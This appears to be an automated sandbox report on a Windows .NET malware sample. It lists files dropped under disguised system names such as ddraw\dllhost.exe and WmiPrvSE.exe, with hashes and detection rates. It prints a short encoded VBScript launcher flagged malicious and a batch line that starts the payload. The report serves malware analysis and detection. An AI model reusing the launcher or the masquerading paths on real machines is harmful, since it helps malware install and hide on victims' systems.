Preview:	MORCzPTJuT1E6v5z9QgD2Sgl7v94QrWbFmXvwRePaCF9UvwQhGd24524rpEEQZ2D6Z9TYKCrwQnzMhRM8sWKOegKtdDHNZ9BJCC4vd2WDvFoRDrKY1FhCsyc3zj4H5eWQlpJeWbfzAGdY22qv2tVUc9bOkB637PIQtXpXhqBajrClUEA62IPMJBymO54Vel2v8NoeMTOLr4uu603gAAAz95GrjDIlwq67zRnHZgtj4DePQDpXCYUelCvCG75JKmZB8x5pNvGeQb46b1afXvjYVbWwfkBbkkYSocRdIAKQR0OJIzkPgawZCBqgaIKmup4pDmS8j6XXkSHfNNoq9v4Jy8PmwuD9zigm6iFfgmpkDZzu3KTMedn8uu1EXpMz3YhCwfjoHIJXGUGZJftlb0eW5i1LrBI1Z0qp1x7YloFWTP1Znc526kXC3LHOnX7GAS8QnbhVhUAwvICpqciPFP5ycovqqtvNr8VBRlvL4jVlkkRvIbhLzrAuXJy9q0pxjwFwwBXFqWUg4TN1XAhOLjY98lnIxwfE3hByfe8HDcecXezD56mqTbl9XFyKXPS41QmXSYW2BaKtF6lewkM1Jzvc5BbZqyuyKkkH1cvgjto2Q24adTYwDbvCfKbQ77MNpWifWemTzpRZK2LDGB5WZ7utyhmrBejmhbM4TZE9rF7XJV1n8YJ6Bzxslzqy25SUFp2tpRtr76pU9Wjdq9tmVnlrneSdtPHvwnSedI7qoc8EKdsOQMI3Mp9cDKFK9P7rz

C:\PerfLogs\ZyNSmFTtlPIEeiJBfofO.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81% Antivirus: Virustotal, Detection: 75%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\3716f76c5abe60cbe58a0468ebc9d97d1ca24960

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	204
Entropy (8bit):	5.6780847823495995
Encrypted:	false
SSDEEP:	3:D0qzpv11H218lkCSg/OpriYOKij577zCdDO9H9BCi95EqTGWpCXr03Ts5PFGRM/j:tb1WenLOprGKEvz8o2oG/dR8fWKW
MD5:	88E83457B784BDF6EB1E089115392359
SHA1:	F0D6E62BF0277705AF32BF54BCFFDCD84B29B58B
SHA-256:	C3B62E017FB6DA221969E8A9E89D61B1C046914F5312C027E1BE50DE1FBF5B32
SHA-512:	DC391E1D317E63B898AE69F84448DC8466307F78FCFAF9FBA247482360D16A6E552CC571497AD7EF3D198850B464795A0D98F611CA3BE72DC602FE082998B4FE
Malicious:	false
Preview:	nXaFu99QUze3LJ8sI4vkFcxzsJZHJp8fugCcSWliwNm4ZkLrwoJXt4GLklXlk2Ho19IoGfZvSNy1z2aH7sVfgkvzZ12r9A83G8DZbhkQOXEgGOVrKPn1glIQOTPOnswRO4v1zAqaHERIfPsKgLgtWGXezxLIRVnflxRMdd2JjNtcUAu8kEscLC5IhRCBzhIvbvgs7grDTXKJ

C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 81% Antivirus: Virustotal, Detection: 75%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Adobe\3716f76c5abe60cbe58a0468ebc9d97d1ca24960

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with very long lines (967), with no line terminators
Category:	dropped
Size (bytes):	967
Entropy (8bit):	5.909943494465111
Encrypted:	false
SSDEEP:	24:p6v6pr/VH43K/20Bbh9jugFAyh2bT5vB76WVby988I6V:p6vQTVY3ozJhBuw1ItJmqye8I6V
MD5:	28FB8F4C3AD3CA27702CFAA4B37F926A
SHA1:	8866F2D54EB3FF8EC1D448C0E996E0C1D0961E34
SHA-256:	18BBA6EBDD31A5894B5213867ACB703EEBEFBD4A988B428AF59625BF98467BAD
SHA-512:	F53AD13EFD247034F9FD20B330F78AE56610F6AA9BAC7449596D3D1225B4BE948D842501CFBFFD86F9C61B1DD33DD52266E37A7DA87DA6DFC818905FB5B1EB40
Malicious:	false
Preview:	2oghJvDNhHOjGozaTCxrYfRPQ5WKLMk1KrGxhm5Y5CajlUbsOoqeOUiXXRQOZ3BUgWZYhC3qGYvWFrn6en5gfGnzItaPWr8CAFDP4CKMvAX0jMSpoUtv7ezatjPylnUZZsV9oYBcdsvfswQ6avlB8NEgPnfVwVkIp8a01SBPSRSPtUr6TTY0BSbMnzuB2qqHHnzuVZEIuWtq4zw56iBc7uGXhOMBiAWllKIGf6k4OQGpjuRyCyEUpNKXgcNHMDju9HFurqa98GNrnbxx6Y9t5C6X9ujCtdrLqWqbohHWYFWj9dtFoZKyE0y6Lsu6GXPeYBAQvWIZQmUzqXXgBdYTT3H0htQ6xKPB01K8ccUSRuhbf9QxUN5n95Lf4KtBFMmGXT9yMZEiJFCiVqVidcmjPmB4qoDStSMFIbEMAbk4JXd33mKNzKinjC0uREIiVvy027a3mJhB1ra2IHBEe0diujfFlT45SCiXinB6LRlqngv2m8mJDEDfSQGSbVSTOmtyICUfGF2NOx5Nyncmqu2O8DFShse09SbAx6tjoHD8M0QfU2ey2pmdue0F7B7XkBO6V4a1428jr4CIwj7pOq8Tq7QSGnmmJpXLmUJZcm49qCw0csTXESI4C4QYoHuQQWaBg0fcahMmw9nnLazYUOh0hdIsDvvU1nsUmuTlM07gFgHDRmMNSW5ByjeDsxYpw2uIQSBaGNMdRBvAVFbbihCfrrgCPQ3ZcRuNv9w8kwGEKctxyesmW7GPzPajw9K0TwBAQhOVSc0wa7VP7sOvhQDfKfXgiNLllPuXatgQPWU3GUy23KlDuYTDtgzvJrwEQPKKN8zNM7gL6JYzqfnYmH1M6rn44uGhjPm1Koo5VX1w2HGjI9FoEYcIX8NfU5Tb09lqhgpC0rDOQEUzkEw4pccKxddMaIlZDZ53faClTDxXVN2TnY5QJYwYgb2DCdlsFnL0IbTKBKl

C:\ProgramData\Adobe\ZyNSmFTtlPIEeiJBfofO.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 81% Antivirus: Virustotal, Detection: 75%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\3716f76c5abe60cbe58a0468ebc9d97d1ca24960

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with very long lines (559), with no line terminators
Category:	dropped
Size (bytes):	559
Entropy (8bit):	5.892377607428588
Encrypted:	false
SSDEEP:	12:Bz1duXgU4cxefEFKWmuAHmutyFNWCToVN8r/t1o/uvkrsuATT43AM3XMz:Ji4cU6FVhuYFn0N8r/7PTzT8jcz
MD5:	EE481121DDE6B909776F797CC4871678
SHA1:	8D750F780BBFF136C28F9D99640AAFBBE16C8D7C
SHA-256:	A2A1FDE53435014F2AF58288ADD5124C553ED103180E3595E017A7D7660DF840
SHA-512:	2B7813D27D458CF213ECCDDB733C84307766CB8B987D6A5DB808350934A34BC2FA47439052F31F69DA2DC8AFEF3DFE1777489392C4E8D91734A8898FCD5593E6
Malicious:	false
Preview:	CNVQonhWEh9izbERsCBKMFvO8xKsblSb25jeuWgNlEOmCmvJkxGijAW7cGS1cy5dPhp42khVfyiH0JLVCAHnet22jlCnEouwIvWf60RAQuCvbOGT46ybqR8foxVRh3R1Dw8FwqZLtHXurGbUfttHzTF0x00Jf9cXdLspPBgOhnrj4NyiWAvxKKBuqIR50Ppto9RfYvFdMekMlg6jBSwfOoNSK89HtlYR78446TJk4SlpkyJJMs3hdKfAw8Vaw8tlGSOmmBmsIMk6DhsVyz5Br0yxc4H88tx6i9iRkghKFKZRjj6PQ9l7Ds4QebKs3nuYYoXE9avSSu5gahN272s8I03zERxJVyRcaB35L1PzOSoSwXz7NRuA5vQhuh9rml6dddGZoRqGn2uzMkDrc05EEQgouVKo1iMmWLzSRaT6koXCBbVKeSPwq2YM6boSGCOEpHdAvuZBh8da3emTAAJjSa6dwmW0vAzhZSW47UZt3NOrY8TcyVSG2pwPL9OIYjPgJ5AkHsVplZpFLOEyT3BastpugHs8FRVT7ric7sVGAmec9qD

C:\Recovery\ZyNSmFTtlPIEeiJBfofO.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 81% Antivirus: Virustotal, Detection: 75%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WmiPrvSE.exe.log

Download File

Process:	C:\Windows\System32\wbem\schannel\WmiPrvSE.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1510
Entropy (8bit):	5.380493107040482
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
MD5:	EC75759911B88E93A2B5947380336033
SHA1:	4D1472BBA520DBF76449567159CD927E94454210
SHA-256:	5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
SHA-512:	EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ZyNSmFTtlPIEeiJBfofO.exe.log

Download File

Process:	C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1510
Entropy (8bit):	5.380493107040482
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
MD5:	EC75759911B88E93A2B5947380336033
SHA1:	4D1472BBA520DBF76449567159CD927E94454210
SHA-256:	5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
SHA-512:	EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dllhost.exe.log

Download File

Process:	C:\Windows\System32\ddraw\dllhost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1510
Entropy (8bit):	5.380493107040482
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
MD5:	EC75759911B88E93A2B5947380336033
SHA1:	4D1472BBA520DBF76449567159CD927E94454210
SHA-256:	5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
SHA-512:	EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\perfCrtmonitorsvcMonitorDll.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	5.37489905566343
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/elStHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6o9Zp/elStzHeqKkh2
MD5:	40B0737D9E519BE2FAE92D41EE16B42F
SHA1:	57A1EE0799583C2FDFE12AB3721B872A7B669D97
SHA-256:	3F0A9499BDFBC87F5AE57306FFEEEA7388214D9AD47CB12050A54F7DC64E7625
SHA-512:	EF059C601229B4A945A5A29A69802D733A525761B3FDA029D2E9B486F400DA2105A0EA88D0F02A90AED1BA1A2335CB5A122B28A93BF54B6C3D8C6FFE4066B28B
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat

Download File

Process:	C:\Users\user\Desktop\PMDfwr7Jal.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	58
Entropy (8bit):	4.21315185001968
Encrypted:	false
SSDEEP:	3:5IW7KRMRtKRMAQFV:5IW7xRtxTFV
MD5:	7C719C66000B0A22A451C0E4D3CDEBF7
SHA1:	6ED1082FFD2F07F82B0BAC5753CD8E1BF3E12096
SHA-256:	711C9F3EA1CEF74CF02FE1C4D98063A5D436F47DB265491DDC4ACFB48953FDD1
SHA-512:	97CB02F8DEF90E31BB094C14882F818033DC98E9297A0D5F8AD158EE1FEDE3608C13AE5B9E18D6A1F72F24450371593AA3D53F4A8E47DD555A1CF36D65997808
Malicious:	false
Preview:	"%Temp%\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe"

C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe

Download File

Process:	C:\Users\user\Desktop\PMDfwr7Jal.exe
File Type:	data
Category:	dropped
Size (bytes):	209
Entropy (8bit):	5.805951130489528
Encrypted:	false
SSDEEP:	6:GxWvwqK+NkLzWbH9WF08nZNDd3RL1wQJRQh9kX1a0N:GxFMCzWL74d3XBJswN
MD5:	B5ED2F061CF45FFD03BF99D750ACE127
SHA1:	23C74C327A8F47715534AF018463EAAF82F4BA2A
SHA-256:	73755D7F9485EBA68D61877C9D61950324C6D38EB0ED5005ED06DD0EFDAA6A35
SHA-512:	A5C4577F60BE3CF693F9C8904B632E2B25ADF9696BA38CAA68DC7F4FD47FA9C89DEE3AFE5656B6ECF9148A1EC4FF3BB09CE054B4EAFACB4FE709EA61EFC78419
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^uAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JuP.:2uza+D6ZMO:KxrYKDd-1z9TfLR\|2z5frc4mYE~~TBPWl^d+czoAAA==^#~@.

C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

Download File

Process:	C:\Users\user\Desktop\PMDfwr7Jal.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81% Antivirus: Virustotal, Detection: 75%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\ddraw\5940a34987c99120d96dace90a3f93f329dcad63

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	5.682246927946221
Encrypted:	false
SSDEEP:	3:u4KgmjfP0OPps9iIW0cgrW6AR5bRGhUqjy3bWiUleU0Lnw1zulvRsFcRb3An:urgmL3zI5RxB9jSblUlWhRy7n
MD5:	5734C9F42325514BC9052E345EC0BA3F
SHA1:	4CDF2A94969D1A0F336C1C3241E27344609E6B96
SHA-256:	13F4F7C83B6751BEC93C1255A32C40570A38C0C5E7573336D35F693FCA617DB4
SHA-512:	9E65AF1BF767EC79D8F910B958FAAED094AEB7A74CCEDDE0E965F9D34E2FE31FA1F27D67C205ABD09CE70CC7DA3F2AAF781AB1EA513CDFA24A46059E9DF26B21
Malicious:	false
Preview:	w8atVjj8ih4ASACmOfEgz2za8ku02VouYs0zfVT6GSH6s3PT2asyEoU3J9vvzsGM2JlkKMG2LIZgv2rEVa8cn0puX6qgkiGYM5DjRoIpTzm6OxIQRqZYunjCd1MOgkSnBBU0zIwqRSJxNtfjxZO3IsniVBFac4Isg94McSbI3tHce

C:\Windows\System32\ddraw\dllhost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81% Antivirus: Virustotal, Detection: 75%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\wbem\schannel\24dbde2999530ef5fd907494bc374d663924116c

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with very long lines (331), with no line terminators
Category:	dropped
Size (bytes):	331
Entropy (8bit):	5.814246142564426
Encrypted:	false
SSDEEP:	6:DRU51hyFTxAoeT+mX/0EVYrYzLmC1hWGSYQ0Bb9TB1+WxJCftEB0d2hB:DRjhxdJmv/Y8P1nSrARxDstE/B
MD5:	447FECA2BF26D49DBD27556EC3284BA0
SHA1:	DF7BF99D7B456A6EF72996231623E6DDF4A9DACA
SHA-256:	90BC7D160781E9146552B3C5BA92287E2EE0166811E89D35FF6E3A63DE5B8E46
SHA-512:	0BF67B6077593C975C41A397DC926D0F0F27239CAD20713FBDC33892095D17F0B0C2BFA3350E9627C44D5C9162BA57C839F7E34545CBF21376A5D5F54E879A17
Malicious:	false
Preview:	EWHdqm1ki5aFOMvzDvDpb0vI3ILqoUGmCKYmjjQSiP6nZsKEeO6NT42Nk9khaK5NyxDExIPefuGM3IsK8HMaY2TISKCk8t2YTtympGQV8bsixpUcQaiS7fz6d5vnGofv1s3KUFe101b6JuUm0kUiKkay31IuUnOU67rFwJHK5qcGD3wtlIwgU7kRREQc7uhMmHAMDO0qcJmdHUvAEZJL0r98WZys2oNKJPe63kqWSGELUGK6TQXilVV4HBznaIyx5bU10yHesw3unyoQO1YmRpjy3jy1vC6KRQP2wSGeI3zyblRTWjYitLgP2f8Q9Psq0tcWiwd6u3d

C:\Windows\System32\wbem\schannel\WmiPrvSE.exe

Download File

